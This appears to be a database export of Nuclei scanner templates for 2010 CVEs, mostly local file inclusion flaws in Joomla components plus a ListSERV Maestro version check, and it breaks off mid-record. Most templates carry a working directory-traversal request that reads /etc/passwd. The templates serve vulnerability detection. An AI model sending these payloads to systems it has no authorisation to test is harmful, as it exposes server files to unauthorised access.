"CVE-2010-1657.yaml", "content": "id: CVE-2010-1657\n\ninfo:\n name: Joomla! Component SmartSite 1.0.0 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the SmartSite (com_smartsite) component 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. 
(dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.\n remediation: |\n Update to the latest version of Joomla! Component SmartSite or apply the necessary patches to fix the LFI vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1657\n - https://www.exploit-db.com/exploits/12428\n - http://www.vupen.com/english/advisories/2010/1006\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/58175\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2010-1657\n cwe-id: CWE-22\n epss-score: 0.01751\n epss-percentile: 0.87665\n cpe: cpe:2.3:a:recly:com_smartsite:1.0.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: recly\n product: com_smartsite\n tags: cve,cve2010,joomla,lfi,edb,recly\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_smartsite&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100bcb3752f3f8e24379ea159e6831ebe01f2da83a0d58232453372c79b86e08221022100ed629a46f18c172871595fe7120c9aeb0f2441da744b940c59461cde7c96719a:922c64590222798bb761d5b6d8e72950", "hash": "3bde8dddd89350a8fccc9318fe2401b0", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e9d" }, "name": "CVE-2010-1658.yaml", "content": "id: CVE-2010-1658\n\ninfo:\n name: Joomla! Component NoticeBoard 1.3 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the Code-Garage NoticeBoard (com_noticeboard) component 1.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. 
(dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can allow an attacker to read arbitrary files on the server, potentially leading to unauthorized access, sensitive information disclosure, or further attacks.\n remediation: |\n Update to the latest version of Joomla! Component NoticeBoard or apply the necessary patches to fix the LFI vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12427\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1658\n - http://www.vupen.com/english/advisories/2010/1007\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/58176\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2010-1658\n cwe-id: CWE-22\n epss-score: 0.01751\n epss-percentile: 0.87665\n cpe: cpe:2.3:a:code-garage:com_noticeboard:1.3:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: code-garage\n product: com_noticeboard\n tags: cve,cve2010,joomla,lfi,edb,code-garage\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_noticeboard&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100d8786ea9146eb623bc2e6b94ff1ddfd987d8af333475bb9273ff1e2bd35ff26a02200fb7110b7f5395f71dee1c009e3dc058d633f521052cc4f3484c6f358684bbf8:922c64590222798bb761d5b6d8e72950", "hash": "91923b6ab0b4dde90c9b8fbc56e97637", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e9e" }, "name": "CVE-2010-1659.yaml", "content": "id: CVE-2010-1659\n\ninfo:\n name: Joomla! Component Ultimate Portfolio 1.0 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the Ultimate Portfolio (com_ultimateportfolio) component 1.0 for Joomla! 
allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire Joomla! installation.\n remediation: |\n Apply the latest security patches or updates provided by the Joomla! project to fix the LFI vulnerability in Ultimate Portfolio 1.0 component.\n reference:\n - https://www.exploit-db.com/exploits/12426\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1659\n - http://www.exploit-db.com/exploits/12426\n - http://www.vupen.com/english/advisories/2010/1008\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/58177\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2010-1659\n cwe-id: CWE-22\n epss-score: 0.01806\n epss-percentile: 0.86853\n cpe: cpe:2.3:a:webkul:com_ultimateportfolio:1.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: webkul\n product: com_ultimateportfolio\n tags: cve2010,cve,joomla,lfi,edb,webkul\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_ultimateportfolio&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022044961916a557a8da30cac3ced56cc0b76c6ad56a135ccdeedda4e81e2bfea49e022027e20655fa3d414923eda4d6272299f0f4dd2cef72c8f74d3ba8b462a10c390a:922c64590222798bb761d5b6d8e72950", "hash": "94c1ff114b06f4b7857eebb56efedfdb", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e9f" }, "name": "CVE-2010-1714.yaml", "content": "id: CVE-2010-1714\n\ninfo:\n name: Joomla! Component Arcade Games 1.0 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the Arcade Games (com_arcadegames) component 1.0 for Joomla! 
allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.\n remediation: |\n Apply the latest security patches or updates provided by the Joomla! project to fix the LFI vulnerability in the Arcade Games component.\n reference:\n - https://www.exploit-db.com/exploits/12168\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1714\n - http://packetstormsecurity.org/1004-exploits/joomlaarcadegames-lfi.txt\n - http://www.vupen.com/english/advisories/2010/0860\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/57683\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2010-1714\n cwe-id: CWE-22\n epss-score: 0.01751\n epss-percentile: 0.86649\n cpe: cpe:2.3:a:dev.pucit.edu.pk:com_arcadegames:1.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: dev.pucit.edu.pk\n product: com_arcadegames\n tags: cve2010,cve,joomla,lfi,edb,packetstorm,dev.pucit.edu.pk\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_arcadegames&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100ae201cb424c48ebdbe9d704bfa0237570da160cdd6da7886365b2fbe9199bb6a0220327d67a86f6d0c7affd6e58e9bbb1ba78583b91c61cd70e92fd150c8bc9fd79f:922c64590222798bb761d5b6d8e72950", "hash": "9cc6a650bc918c252d71747e1cae27c8", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ea0" }, "name": "CVE-2010-1715.yaml", "content": "id: CVE-2010-1715\n\ninfo:\n name: Joomla! Component Online Exam 1.5.0 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the Online Examination (aka Online Exam or com_onlineexam) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. 
(dot dot) in the controller parameter to index.php.\n remediation: |\n Update to the latest version of Joomla! Component Online Exam and apply any available patches or security updates.\n reference:\n - https://www.exploit-db.com/exploits/12174\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1715\n - http://packetstormsecurity.org/1004-exploits/joomlaonlineexam-lfi.txt\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/57677\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P\n cvss-score: 6.8\n cve-id: CVE-2010-1715\n cwe-id: CWE-22\n epss-score: 0.01242\n epss-percentile: 0.83996\n cpe: cpe:2.3:a:pucit.edu:com_onlineexam:1.5.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: pucit.edu\n product: com_onlineexam\n tags: cve,cve2010,joomla,lfi,edb,packetstorm,pucit.edu\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_onlineexam&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100c47a4bdd67634653ce4da4af40c81205ffdcc542bbe4c92693d10063b0f15a6a02202182f5b7abe3de71edc4955d26840eeaaa624feab87fc896bee09c8bb5f97b8f:922c64590222798bb761d5b6d8e72950", "hash": "e8bd82c86c13df14eb4a6c89055c388a", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ea1" }, "name": "CVE-2010-1717.yaml", "content": "id: CVE-2010-1717\n\ninfo:\n name: Joomla! Component iF surfALERT 1.2 - Local File Inclusion\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in the iF surfALERT (com_if_surfalert) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. 
(dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage.\n remediation: |\n Apply the latest patch or upgrade to a newer version of the Joomla! Component iF surfALERT to mitigate the LFI vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12291\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1717\n - http://www.vupen.com/english/advisories/2010/0924\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/Live-Hack-CVE/CVE-2010-1717\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-1717\n cwe-id: CWE-22\n epss-score: 0.01733\n epss-percentile: 0.87598\n cpe: cpe:2.3:a:if_surfalert_project:if_surfalert:1.2:*:*:*:*:joomla\\!:*:*\n metadata:\n max-request: 1\n vendor: if_surfalert_project\n product: if_surfalert\n framework: joomla\\!\n tags: cve,cve2010,joomla,lfi,edb,if_surfalert_project,joomla\\!\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_if_surfalert&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100d077e7a8b82e5dacdc61932a6699b6f16fe3599d2fe585624ab67c61dbf65ad9022100815c9cafcb46abe0609189924d5076416102570d3f3a4801a745b86b82a64336:922c64590222798bb761d5b6d8e72950", "hash": "ef3b58e41620b909fe21380380246ff7", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ea2" }, "name": "CVE-2010-1718.yaml", "content": "id: CVE-2010-1718\n\ninfo:\n name: Joomla! Component Archery Scores 1.0.6 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in archeryscores.php in the Archery Scores (com_archeryscores) component 1.0.6 for Joomla! 
allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.\n remediation: |\n Update to the latest version of Joomla! Component Archery Scores or apply the patch provided by the vendor.\n reference:\n - https://www.exploit-db.com/exploits/12282\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1718\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P\n cvss-score: 6.8\n cve-id: CVE-2010-1718\n cwe-id: CWE-22\n epss-score: 0.00826\n epss-percentile: 0.81565\n cpe: cpe:2.3:a:lispeltuut:com_archeryscores:1.0.6:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: lispeltuut\n product: com_archeryscores\n tags: cve,cve2010,joomla,lfi,edb,lispeltuut\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100ecd7446fef1ce54e4f4248ba012aa11ea08e53dd3f5a36fa12d01852d0bf6cd5022100d86f62c4cc116ef4a60241471d37ff8b72ad493ced0d7e6002f1c5ac3db35856:922c64590222798bb761d5b6d8e72950", "hash": "79a21719f00e5011d33d8b795e83bd0e", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ea3" }, "name": "CVE-2010-1719.yaml", "content": "id: CVE-2010-1719\n\ninfo:\n name: Joomla! Component MT Fire Eagle 1.2 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the MT Fire Eagle (com_mtfireeagle) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. 
(dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.\n remediation: |\n Apply the latest security patches or updates provided by the Joomla! Component MT Fire Eagle 1.2 vendor.\n reference:\n - https://www.exploit-db.com/exploits/12233\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1719\n - http://www.exploit-db.com/exploits/12233\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/57850\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P\n cvss-score: 6.8\n cve-id: CVE-2010-1719\n cwe-id: CWE-22\n epss-score: 0.01671\n epss-percentile: 0.87378\n cpe: cpe:2.3:a:moto-treks:com_mtfireeagle:1.2:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: moto-treks\n product: com_mtfireeagle\n tags: cve2010,cve,lfi,edb,joomla,moto-treks\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100efdd3798466d640e256d5a756ee7b624ed3eb6e4e1eff2d6307ab2bac89b607c022057069d8f4c691f3e6f4948c0d8355e3f992e8ff17c66ed10eec31c3abe925c60:922c64590222798bb761d5b6d8e72950", "hash": "fb0cad03f8823a2a9f71811cb417d648", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ea4" }, "name": "CVE-2010-1722.yaml", "content": "id: CVE-2010-1722\n\ninfo:\n name: Joomla! Component Online Market 2.x - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the Online Market (com_market) component 2.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. 
(dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage.\n remediation: |\n Apply the latest security patches or updates provided by Joomla! to fix the LFI vulnerability in the Online Market 2.x component.\n reference:\n - https://www.exploit-db.com/exploits/12177\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1722\n - http://www.exploit-db.com/exploits/12177\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/57674\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P\n cvss-score: 6.8\n cve-id: CVE-2010-1722\n cwe-id: CWE-22\n epss-score: 0.01242\n epss-percentile: 0.83996\n cpe: cpe:2.3:a:dev.pucit.edu.pk:com_market:2.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: dev.pucit.edu.pk\n product: com_market\n tags: cve,cve2010,joomla,lfi,edb,dev.pucit.edu.pk\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_market&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402203f0d1de10ccaf9a9d9ed87e953e7cfe386fa078accae00d5db36ab20b676e4d20220323bb7687e98c78a52e9922aa6f83bb11e71e70f3896c302d1e67bc7b350fa86:922c64590222798bb761d5b6d8e72950", "hash": "4de74392caa6ed4179a5778d3fe265bd", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ea5" }, "name": "CVE-2010-1723.yaml", "content": "id: CVE-2010-1723\n\ninfo:\n name: Joomla! Component iNetLanka Contact Us Draw Root Map 1.1 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the iNetLanka Contact Us Draw Root Map (com_drawroot) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. 
(dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can result in unauthorized access to sensitive files on the server, potentially leading to further compromise of the system.\n remediation: |\n Update to the latest version of the iNetLanka Contact Us Draw Root Map component or apply the patch provided by the vendor to fix the LFI vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12289\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1723\n - http://www.exploit-db.com/exploits/12289\n - http://www.vupen.com/english/advisories/2010/0926\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P\n cvss-score: 6.8\n cve-id: CVE-2010-1723\n cwe-id: CWE-22\n epss-score: 0.01956\n epss-percentile: 0.87487\n cpe: cpe:2.3:a:joomlacomponent.inetlanka:com_drawroot:1.1:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: joomlacomponent.inetlanka\n product: com_drawroot\n tags: cve,cve2010,joomla,lfi,edb,joomlacomponent.inetlanka\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_drawroot&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402201f2f6d4b03887f91f05f31e90985ffe041fc19b52146f7a927b36a949b69b27502200af68b38786ac9d14967173b092a4efe378dbf324842eda5736934450c559c42:922c64590222798bb761d5b6d8e72950", "hash": "1e822ec333c86d778c0b1a21a41cd2de", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ea6" }, "name": "CVE-2010-1858.yaml", "content": "id: CVE-2010-1858\n\ninfo:\n name: Joomla! Component SMEStorage - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the SMEStorage (com_smestorage) component before 1.1 for Joomla! 
allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability allows an attacker to read arbitrary files on the server, leading to unauthorized access and potential data leakage.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/11853\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1858\n - http://packetstormsecurity.org/1003-exploits/joomlasmestorage-lfi.txt\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/57108\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2010-1858\n cwe-id: CWE-22\n epss-score: 0.01155\n epss-percentile: 0.84543\n cpe: cpe:2.3:a:gelembjuk:com_smestorage:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: gelembjuk\n product: com_smestorage\n tags: cve2010,cve,joomla,lfi,edb,packetstorm,gelembjuk\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_smestorage&controller=../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a0048304602210094404f0f2f56a48166becec496073702fc13c233b56b332a59b23f75f2e9e664022100a030d88a7de00e472b914f484390aaf26834775c6ffcaf7329883a6386f70366:922c64590222798bb761d5b6d8e72950", "hash": "82ad5a34c723c055791ac8ba24b054d5", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ea7" }, "name": "CVE-2010-1870.yaml", "content": "id: CVE-2010-1870\n\ninfo:\n name: ListSERV Maestro <= 9.0-8 RCE\n author: b0yd\n severity: medium\n description: A struts-based OGNL remote code execution vulnerability exists in ListSERV Maestro before and including version 9.0-8.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker 
to execute arbitrary code on the affected system.\n remediation: |\n Upgrade to a patched version of ListSERV Maestro that is not affected by this vulnerability.\n reference:\n - https://www.securifera.com/advisories/sec-2020-0001/\n - https://packetstormsecurity.com/files/159643/listservmaestro-exec.txt\n - https://www.exploit-db.com/exploits/14360\n - http://confluence.atlassian.com/display/FISHEYE/FishEye+Security+Advisory+2010-06-16\n - http://blog.o0o.nu/2010/07/cve-2010-1870-struts2xwork-remote.html\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:N/I:P/A:N\n cvss-score: 5\n cve-id: CVE-2010-1870\n cwe-id: CWE-917\n epss-score: 0.06174\n epss-percentile: 0.92842\n cpe: cpe:2.3:a:apache:struts:2.0.0:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: apache\n product: struts\n tags: cve,cve2010,packetstorm,edb,rce,listserv,ognl,apache\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/lui/\"\n - \"{{BaseURL}}/hub/\"\n\n extractors:\n - type: regex\n regex:\n - 'LISTSERV Maestro\\s+9\\.0-[123456780]'\n - 'LISTSERV Maestro\\s+[5678]'\n - 'Administration Hub 9\\.0-[123456780]'\n - 'Administration Hub [5678]'\n# digest: 4a0a00473045022009c28af24d49d9f2b2cd719eef0eab59eb17456cc5d44bc1d3fc2767d24ef9c4022100be33c84b0809ba11233918e74323b720e874f8870e0a84637e4a6b55f773050f:922c64590222798bb761d5b6d8e72950", "hash": "0373cf2c8a3724c373425973137ab354", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ea8" }, "name": "CVE-2010-1875.yaml", "content": "id: CVE-2010-1875\n\ninfo:\n name: Joomla! Component Property - Local File Inclusion\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in the Real Estate Property (com_properties) component 3.1.22-03 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. 
(dot dot) in the controller parameter to index.php.\n impact: |\n This vulnerability can result in the exposure of sensitive data, such as configuration files, database credentials, or other sensitive information stored on the server.\n remediation: |\n To remediate this vulnerability, it is recommended to update the affected Joomla! component to the latest version or apply the necessary patches provided by the vendor.\n reference:\n - https://www.exploit-db.com/exploits/11851\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1875\n - http://www.exploit-db.com/exploits/11851\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/57110\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-1875\n cwe-id: CWE-22\n epss-score: 0.01222\n epss-percentile: 0.83839\n cpe: cpe:2.3:a:com-property:com_properties:3.1.22-03:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: com-property\n product: com_properties\n tags: cve2010,cve,joomla,lfi,edb,com-property\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_properties&controller=../../../../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502201680f40e20b2858e86788424a8a44bc6958af8559d3f80c705f1af1c7035951c0221009efb7b9e0216197bd0463ed5285897d4212bdd853eab1b1e11ac3a3ef59792b6:922c64590222798bb761d5b6d8e72950", "hash": "600310138b16f4156ce306314744e8b6", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ea9" }, "name": "CVE-2010-1878.yaml", "content": "id: CVE-2010-1878\n\ninfo:\n name: Joomla! Component OrgChart 1.0.0 - Local File Inclusion\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in the OrgChart (com_orgchart) component 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. 
(dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.\n remediation: |\n Apply the latest patch or upgrade to a newer version of the Joomla! Component OrgChart to mitigate the vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12317\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1878\n - http://packetstormsecurity.org/1004-exploits/joomlaorgchart-lfi.txt\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/58031\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-1878\n cwe-id: CWE-22\n epss-score: 0.00826\n epss-percentile: 0.81565\n cpe: cpe:2.3:a:blueflyingfish.no-ip:com_orgchart:1.0.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: blueflyingfish.no-ip\n product: com_orgchart\n tags: cve,cve2010,lfi,edb,packetstorm,joomla,blueflyingfish.no-ip\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_orgchart&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100dc5b682510b8bee3ed2a7bcec2db3688588e5cd495dbb210642e123af4e422c1022030a7073ddc270bea7a017af5c0334ff17b94e2c32f1bba9cd2cf581e1e3a997c:922c64590222798bb761d5b6d8e72950", "hash": "07db35ef266679fb2cc65db0268be7b7", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307eaa" }, "name": "CVE-2010-1952.yaml", "content": "id: CVE-2010-1952\n\ninfo:\n name: Joomla! Component BeeHeard 1.0 - Local File Inclusion\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in the BeeHeard (com_beeheard) and BeeHeard Lite (com_beeheardlite) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. 
(dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, sensitive information disclosure, and potential remote code execution.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12239\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1952\n - http://www.exploit-db.com/exploits/12239\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/57845\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-1952\n cwe-id: CWE-22\n epss-score: 0.01242\n epss-percentile: 0.85196\n cpe: cpe:2.3:a:cmstactics:com_beeheard:1.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: cmstactics\n product: com_beeheard\n tags: cve,cve2010,joomla,lfi,edb,cmstactics\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022061129aea74772e6b2b1371d4e9ba2aa09c9f71d86f09cf33e41a27be90867130022100d2644c5fc639b09a774b82d50f93ec5ca8f39406463ee51c885db6833b1deb61:922c64590222798bb761d5b6d8e72950", "hash": "6c829e2cc7d3629cbbd95b8f8237337f", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307eab" }, "name": "CVE-2010-1953.yaml", "content": "id: CVE-2010-1953\n\ninfo:\n name: Joomla! Component iNetLanka Multiple Map 1.0 - Local File Inclusion\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in the iNetLanka Multiple Map (com_multimap) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. 
